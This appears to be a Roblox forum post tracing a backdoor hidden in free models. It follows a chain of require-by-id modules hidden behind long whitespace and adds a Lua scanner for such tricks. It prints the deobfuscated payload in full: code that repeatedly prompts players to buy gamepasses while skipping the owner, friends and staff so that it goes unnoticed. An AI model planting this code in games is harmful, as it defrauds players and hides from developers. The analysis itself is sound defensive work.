Viruses / backdoors
I think you’ve already heard about cloned plugins / free models,
and you may already know about the viruses and backdoors in them.
the most basic ones don’t even bother hiding the scripts or the creators,
but there’s a more dangerous type that is hard to detect.
it’s still a virus, but it’s hidden somewhere deep in the script behind ~200 spaces and this
that is the image of one of the victims of that kind of virus
let’s look at how it works inside
- first, this getfenv() thing just means require when you run the code
so what we are interested in is following the id (5758303792)
usually it’s a chain of ids,
something like
- 5758303792 - another id - another id - another id - … real script
that means they just make it hard to find:
each script in the chain just requires the next one
in the end one user helped me with that and found the final id
- 9704956167
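One way to look for the first link of such a chain in your own place, as an added example that is not part of the original post: it flags lines where code sits behind a long run of spaces, lines that mention getfenv or loadstring, and require calls that take a number. The function name `scanSource`, the 100-space threshold and the sample id 1234567890 are assumptions made up for this example.

```lua
-- Added example: heuristic scan for the hiding tricks described in this post.
-- Indicators and the 100-space threshold are assumptions, not a complete detector.
local PAD = string.rep(" ", 100)

local function scanSource(name, source)
    local findings = {}
    local lineNo = 0
    for line in (source .. "\n"):gmatch("(.-)\r?\n") do
        lineNo = lineNo + 1
        local reasons = {}
        -- Code pushed off-screen behind a long run of spaces (tabs expanded first).
        local expanded = line:gsub("\t", "    ")
        local _, padEnd = expanded:find(PAD, 1, true)
        if padEnd and expanded:find("%S", padEnd + 1) then
            table.insert(reasons, "code after 100+ spaces")
        end
        if line:find("getfenv", 1, true) then table.insert(reasons, "getfenv") end
        if line:find("loadstring", 1, true) then table.insert(reasons, "loadstring") end
        -- require() called with a number instead of a ModuleScript instance.
        if line:find("require%s*%(%s*%d+") then table.insert(reasons, "require by id") end
        if #reasons > 0 then
            -- A long number on a flagged line is probably the next asset id in the chain.
            local id = line:match("%d%d%d%d%d%d%d+") or "none"
            table.insert(findings, string.format("%s:%d: %s (id: %s)",
                name, lineNo, table.concat(reasons, ", "), id))
        end
    end
    return findings
end

-- Constructed sample: a harmless line, then a call hidden behind 200 spaces.
local sample = "print('hello')\nlocal x = 1" .. string.rep(" ", 200)
    .. "getfenv()['require'](1234567890)\n"

if game then
    -- Roblox Studio command bar: scan every script in the open place.
    for _, inst in ipairs(game:GetDescendants()) do
        local ok, src = pcall(function()
            return inst:IsA("LuaSourceContainer") and inst.Source
        end)
        if ok and src then
            for _, f in ipairs(scanSource(inst:GetFullName(), src)) do warn(f) end
        end
    end
else
    -- Plain Lua: run on the constructed sample.
    for _, f in ipairs(scanSource("Sample", sample)) do print(f) end
end
```

Only the first script of the chain lives in the place file, so a hit here gives you the id to start following; the later links are fetched when the code runs. Legitimate modules also use require by id, so treat each finding as something to read, not as proof.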
Instruction
btw, a small instruction on how to get the module by id:
you just go to the creator store and paste the id
https://create.roblox.com/store/asset/[ID HERE]
you land on the page and just download the file
Page:
Download button:
and then you can drop it into the place
Uncovering creator
Back to uncovering the truth.
you will get a script that looks like this
MainModule:
the structure looks like this
- long obfuscated code (“the long part my guess is just decrypting the obfuscated code and the short part is the real code”)
- custom lua loadstring
what we are searching for is in the main module, and luckily we don’t have to search for long in this case
because the owner gave it to us at the start
as we follow that, we get to the main script
then again it is the same layout
looks the same right?
but things get way easier from now on
MainModule:
now finally we can read something!
the script just combines the descriptions of 2 gamepasses and executes them in the parser
we can simply run the checks and see what the actual code looks like
```lua
spawn(function()
    local Players, MarketService, GamepassIds, Time, GameCreatorType, GameCreatorId = game:GetService("Players"), game:GetService("MarketplaceService"),
        {107584795, 107584737}, "############### ##### #################", game.CreatorType, game.CreatorId
    function ShouldWePrompt(plr)
        if GameCreatorType == Enum.CreatorType.User then
            if plr:IsFriendsWith(GameCreatorId) or plr.UserId == GameCreatorId then
                return false
            end
        elseif GameCreatorType == Enum.CreatorType.Group then
            local Role = plr:GetRoleInGroup(GameCreatorId)
            local role = tostring(Role):lower()
            if role:find("admin") or
                role:find("owner") or
                role:find("chairman") or
                role:find("dev") or
                role:find("creator") or
                role:find("vice") or
                role:find("alt") or
                role:find("barista") or
                role:find("senior") or
                role:find("mod") or
                role:find("staff") or
                role:find("assistant") or
                role:find("trainee") or
                role:find("ally") or
                role:find("allied") or
                role:find("allies") or
                role:find("manag") or
                role:find("contrib") or
                role:find("officer") or
                role:find("hold") or
                role:find("partner") or
                role:find("manage") or
                role:find("intern") or
                role:find("supervis") or
                role:find("coord") or
                role:find("exec") or
                role:find("cook") or
                role:find("chef") or
                role:find("cashier") or
                role:find("shift") or
                role:find("lead") or
                role:find("pres") or
                plr:GetRankInGroup(GameCreatorId) > 200 then
                return false
            end
        end
        return true
    end
    function Prompt(plr)
        spawn(function()
            for i = 1, 10 do
                for i,v in pairs(GamepassIds) do
                    if not MarketService:UserOwnsGamePassAsync(plr.UserId,v) then
                        MarketService:PromptGamePassPurchase(plr,v)
                        if plr.MembershipType == Enum.MembershipType.Premium then
                            wait(Time/2)
                        else wait(Time)
                        end
                    end
                end
            end
        end)
    end
    Players.PlayerAdded:Connect(function(Player)
        if ShouldWePrompt(Player) then
            Prompt(Player)
        end
    end)
    for i,Player in pairs(Players:GetPlayers()) do
        if ShouldWePrompt(Player) then if ######################################################### then
            else Prompt(Player)
            end
        end
    end
end)
```
and quickly analyzing the code, you can see that it spams 2 gamepasses
explanation of the code above
when a player joins, it spams them with 2 gamepasses
but before that it checks whether the game was created under a group or by a player
Group
- if you are the owner
- if by the group, it checks whether you have specific text in your group role
- if the role value is higher than 200
- if you are friends with the owner
Player
- if you are the owner
- if you are friends with the owner
and then it prompts the gamepasses if all of the above is false
Discovery
The creator used a lot of alts to publish the scripts / passes
And the group who owns these gamepasses is Million Dollar Circle - Roblox
Thanks for the attention!
Hopefully Roblox moderation can investigate this one!
Have you uncovered some of the virus creators?
If yes, can you share your own story?